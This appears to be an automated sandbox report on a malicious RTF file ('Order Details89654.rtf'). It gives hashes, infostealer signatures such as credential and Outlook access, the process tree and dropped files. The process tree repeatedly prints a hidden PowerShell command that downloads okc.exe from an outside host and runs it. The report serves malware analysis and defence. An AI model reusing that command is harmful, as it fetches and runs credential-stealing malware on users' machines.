Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30/01/2023, 12:53

General

  • Target

    Order Details89654.rtf

  • Size

    256KB

  • MD5

    fddce2b3c97faecb1feb8fea47edf53e

  • SHA1

    c5fdcd9c686970724faee24edab87663a16e92eb

  • SHA256

    39e6d2cfe42c41a7d571ed30431236b6383b064e1ff0b72757457e9cc4ae46c1

  • SHA512

    d0dec423bd97ba1e435961e9bb3c8382481b7174e0272785e1b2e04e969d8ba6cacd1a93be2a72d57c325ce2b28c19725ebb86c1b1779ea544eb50ec38acbf27

  • SSDEEP

    1536:iXRiI4pd4t55vRvHv6ImzHNIS5rFwOH3GTlXa3wVbUxZVzFz76mAg5eeVhMDw5ww:i4U5UOzypVzFtr5RDAw5wfY

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://rgkkzna.com/okc.exe

Signatures

  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order Details89654.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://rgkkzna.com/okc.exe','C:\Users\Admin\AppData\Roaming\okc.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://rgkkzna.com/okc.exe','C:\Users\Admin\AppData\Roaming\okc.exe')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1296
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\okc.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Users\Admin\AppData\Roaming\okc.exe
        C:\Users\Admin\AppData\Roaming\okc.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Users\Admin\AppData\Roaming\okc.exe
          "C:\Users\Admin\AppData\Roaming\okc.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1056
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://rgkkzna.com/okc.exe','C:\Users\Admin\AppData\Roaming\okc.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1324
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://rgkkzna.com/okc.exe','C:\Users\Admin\AppData\Roaming\okc.exe')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1888
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\okc.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:572
      • C:\Users\Admin\AppData\Roaming\okc.exe
        C:\Users\Admin\AppData\Roaming\okc.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:532
        • C:\Users\Admin\AppData\Roaming\okc.exe
          "C:\Users\Admin\AppData\Roaming\okc.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Modifies system certificate store
          • Suspicious behavior: SetClipboardViewer
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:580
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://rgkkzna.com/okc.exe','C:\Users\Admin\AppData\Roaming\okc.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://rgkkzna.com/okc.exe','C:\Users\Admin\AppData\Roaming\okc.exe')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1168
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\okc.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:636
      • C:\Users\Admin\AppData\Roaming\okc.exe
        C:\Users\Admin\AppData\Roaming\okc.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:780
        • C:\Users\Admin\AppData\Roaming\okc.exe
          "C:\Users\Admin\AppData\Roaming\okc.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious behavior: SetClipboardViewer
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • outlook_office_path
          • outlook_win_path
          PID:1696
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1744

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      356f86d0a3d9e64482d9e0285a54cde2

      SHA1

      ddaf4cb4082396b7bdae0a4aa28049c5d5ab201e

      SHA256

      70d86f0f12f80405c83875167fb88f2b15beb3abf54973c360708ec6d63f5af2

      SHA512

      39c6559a25dc6acaab01327be651236ba5cb4190116b44e43c193468860385532ac6b35c271ee96ac503001582b6c7de9224bef480448a2ccf951bf6d903e81f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      356f86d0a3d9e64482d9e0285a54cde2

      SHA1

      ddaf4cb4082396b7bdae0a4aa28049c5d5ab201e

      SHA256

      70d86f0f12f80405c83875167fb88f2b15beb3abf54973c360708ec6d63f5af2

      SHA512

      39c6559a25dc6acaab01327be651236ba5cb4190116b44e43c193468860385532ac6b35c271ee96ac503001582b6c7de9224bef480448a2ccf951bf6d903e81f

    • C:\Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • C:\Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • C:\Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • C:\Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • C:\Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • C:\Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • C:\Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • \Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • \Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • \Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • \Users\Admin\AppData\Roaming\okc.exe

      Filesize

      656KB

      MD5

      f212aea4eb7dd8a4cbb263017b1eca47

      SHA1

      d6aee0d64677c422927d8c56a2af9d77d7610cc3

      SHA256

      efe3cf08bae2419592ffab4158d5edd20aef2788678fa930503c06956c7b524f

      SHA512

      6734b801d801ab0f442df5d009fb7453324c9226db6c92bebb185d67aad9d1a80d06e2790852ff36095e7c6f92ee35fc9220e838b23e4fedb529784b7dcccc65

    • memory/1056-101-0x0000000000400000-0x0000000000430000-memory.dmp

      Filesize

      192KB

    • memory/1056-106-0x0000000000400000-0x0000000000430000-memory.dmp

      Filesize

      192KB

    • memory/1056-105-0x0000000000400000-0x0000000000430000-memory.dmp

      Filesize

      192KB

    • memory/1056-104-0x0000000000400000-0x0000000000430000-memory.dmp

      Filesize

      192KB

    • memory/1056-112-0x0000000000400000-0x0000000000430000-memory.dmp

      Filesize

      192KB

    • memory/1056-102-0x0000000000400000-0x0000000000430000-memory.dmp

      Filesize

      192KB

    • memory/1056-110-0x0000000000400000-0x0000000000430000-memory.dmp

      Filesize

      192KB

    • memory/1168-90-0x0000000064D10000-0x00000000652BB000-memory.dmp

      Filesize

      5.7MB

    • memory/1168-89-0x0000000004CE0000-0x0000000004FB2000-memory.dmp

      Filesize

      2.8MB

    • memory/1296-63-0x000000006B370000-0x000000006B91B000-memory.dmp

      Filesize

      5.7MB

    • memory/1296-62-0x000000006B370000-0x000000006B91B000-memory.dmp

      Filesize

      5.7MB

    • memory/1684-54-0x0000000072F11000-0x0000000072F14000-memory.dmp

      Filesize

      12KB

    • memory/1684-73-0x000000007197D000-0x0000000071988000-memory.dmp

      Filesize

      44KB

    • memory/1684-55-0x0000000070991000-0x0000000070993000-memory.dmp

      Filesize

      8KB

    • memory/1684-58-0x000000007197D000-0x0000000071988000-memory.dmp

      Filesize

      44KB

    • memory/1684-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1684-57-0x0000000076401000-0x0000000076403000-memory.dmp

      Filesize

      8KB

    • memory/1744-97-0x000007FEFC341000-0x000007FEFC343000-memory.dmp

      Filesize

      8KB

    • memory/1888-78-0x0000000004D60000-0x0000000005032000-memory.dmp

      Filesize

      2.8MB

    • memory/1888-79-0x0000000064D30000-0x00000000652DB000-memory.dmp

      Filesize

      5.7MB

    • memory/1980-100-0x0000000000B00000-0x0000000000B30000-memory.dmp

      Filesize

      192KB

    • memory/1980-72-0x0000000000560000-0x0000000000574000-memory.dmp

      Filesize

      80KB

    • memory/1980-70-0x0000000000D80000-0x0000000000E2A000-memory.dmp

      Filesize

      680KB

    • memory/1980-99-0x0000000005000000-0x000000000506C000-memory.dmp

      Filesize

      432KB

    • memory/1980-98-0x00000000006B0000-0x00000000006BA000-memory.dmp

      Filesize

      40KB